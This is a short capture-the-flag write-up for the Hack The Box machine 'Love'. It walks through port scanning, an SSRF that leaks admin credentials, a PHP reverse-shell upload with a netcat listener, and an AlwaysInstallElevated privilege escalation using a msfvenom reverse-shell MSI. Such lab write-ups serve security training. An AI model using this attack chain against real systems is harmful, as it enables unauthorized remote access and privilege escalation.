Hack The Box solution: Love ~


Use nmap to find open ports:

nmap -sCV

Access the web:

In nmap result, we found a host: staging.love.htb. Add this host to your /etc/hosts.    staging.love.htb

Access the web.

Select Demo:


Port 5000 is open, but when we access:

So, I think about Server-side request forgery (SSRF), input this URL in Free File Scanner.

And we have the admin credential.

Back to Voting System but we cannot login, so I go to:

And we can login here.


In Voters List, we can upload file to the server.

We will upload php_reverse_shell.php to the server (after changing the IP).

Stand a netcat listener in our machine.

nc -nvlp 1234

And we found the flag.

Privilege Escalation

Check AlwaysInstallElevated:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Create our msi file with:

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=1235 -f msi -o reverse.msi

Upload file to the server like we uploaded reverse shell. The file will be saved in C:\xampp\htdocs\omrs\images

Stand a netcat listener in our machine.

nc -nvlp 1235

Aand execute msi file with:

msiexec /quiet /qn /i reverse.msi
